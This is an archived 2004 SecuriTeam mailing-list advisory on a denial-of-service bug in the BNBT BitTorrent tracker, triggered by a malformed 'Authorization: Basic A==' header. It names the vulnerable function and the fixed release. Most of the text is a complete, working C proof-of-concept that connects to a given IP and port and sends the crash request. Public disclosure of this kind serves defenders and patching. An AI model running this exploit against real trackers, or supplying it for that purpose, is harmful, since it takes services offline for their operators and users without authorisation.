[NT] BNBT BitTorrent Tracker DoS
From: SecuriTeam (support_at_securiteam.com)
Date: 05/23/04
- Previous message: SecuriTeam: "[EXPL] Allegro RomPager DoS Exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 23 May 2004 14:55:20 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
BNBT BitTorrent Tracker DoS
------------------------------------------------------------------------
SUMMARY
<http://bnbt.go-dedicated.com/> BNBT was "written by Trevor Hogan. BNBT
is a complete port of the original Python BitTorrent tracker to C++ for
speed and efficiency. BNBT also offers many additional features beyond the
original Python BitTorrent tracker, plus it's easy to use and
customizable". A specifically crafted HTTP GET request that contains
'Authorization: Basic A==' will cause the BNBT server to crash.
DETAILS
Vulnerable Systems:
* All versions of BNBT prior to BNBT Beta 7.5 Release 3
Immune Systems:
* BNBT Beta 7.5 Release 3
The DoS problem also effect <http://bnbteasytracker.sourceforge.net/>
BTNT easy tracker.
A malicious attacker exploiting this vulnerability can crash the remote
tracker, and might be able to execute arbitrary code.
Vulnerable Code:
The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
Vendor Status:
A version of BTNT which addresses this vulnerability can be found at:
<http://bnbt.go-dedicated.com/bnbt75b-3.zip>
http://bnbt.go-dedicated.com/bnbt75b-3.zip
Proof of Concept Code:
The code was tested on Windows XP:
/****************************/
PoC to crash the server
/****************************/
/* BNBT BitTorrent Tracker Denial Of Service
Versions:
cbtt75_20040515
Beta 7.5 Release 2 and prior versions
Vendors:
http://bnbt.go-dedicated.com/
http://bnbteasytracker.sourceforge.net/
http://sourceforge.net/projects/bnbtusermods/
The bug is located in util.cpp in the Util_DecodeHTTPAuth function.
Coded and Discovered by:
badpack3t <badpack3t@security-protocols.com>
.:sp research labs:.
www.security-protocols.com
5.21.2004
This PoC will only DoS the server to verify if it is vulnerable.
*/
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET / HTTP/1.0\r\n"
"Authorization: Basic A==\r\n\r\n";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port,bufsize;
SOCKET mysocket;
if (argc < 2)
{
printf("BNBT BitTorrent Tracker DoS by badpack3t\r\n
<badpack3t@security-protocols.com>\r\n\r\n", argv[0]);
printf("Usage:\r\n %s <targetip> [targetport] (default is 6969)\r\n\r\n",
argv[0]);
printf("www.security-protocols.com\r\n\r\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
target = argv[1];
port = 6969;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 1024;
if (argc >= 4) bufsize = atoi(argv[3]);
mysocket = socket(AF_INET, SOCK_STREAM, 0);
if(mysocket==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("Resolve of %s failed\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Sending Payload...\n");
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
{
printf("Error Sending the Exploit Payload\r\n");
closesocket(mysocket);
exit(1);
}
printf("Payload has been sent! Check if the webserver is dead.\r\n");
closesocket(mysocket);
WSACleanup();
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by
<mailto:badpack3t@security-protocols.com> badpack3t.
The original article can be found at:
<http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt>
http://fux0r.phathookups.com/advisory/sp-x12-advisory.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] Allegro RomPager DoS Exploit"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
